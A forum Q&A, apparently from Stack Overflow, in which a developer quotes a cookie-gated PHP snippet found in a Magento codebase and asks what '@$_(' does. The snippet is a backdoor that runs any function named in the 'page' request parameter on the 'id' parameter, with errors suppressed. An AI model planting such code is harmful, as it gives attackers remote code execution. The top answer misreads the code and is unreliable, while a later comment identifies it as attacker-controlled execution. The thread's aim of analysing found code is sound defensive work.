# What does the PHP function @$_ do?

Tags: php, magento, magento-1.9

I found this bit of custom code in a Magento codebase I'm working on:

```
if( Mage::getSingleton('core/cookie')->get('gzipname') ) 
{
    ($_=$this->getRequest()->getParam('page')).@$_($this->getRequest()->getParam('id'));
    exit;
}
```

Can someone please tell me what `.@$_(` does and what this code might be intending to do?

Answer (score 3):

The `@` suppresses any warnings that `$_($this->getRequest()->getParam('id'))` might pull up. The `$_` part is just the concatenated part where `$_` + `($this->getRequest()->getParam('id')` would be the parameter, so something like `$_ID`

Comment: Thanks so much for the info - any thoughts about what this code might be doing?

Comment: On first reading, it looks like it's using a class defined by parameter '`page`' and calling its method defined by the same parameter. And that method is passed parameter '`id`'. In short, it's running an attacker defined method with the attacker defined parameter - it basically runs $page.$page($id) where $page and $id are given by the browser. And error reporting is turned off!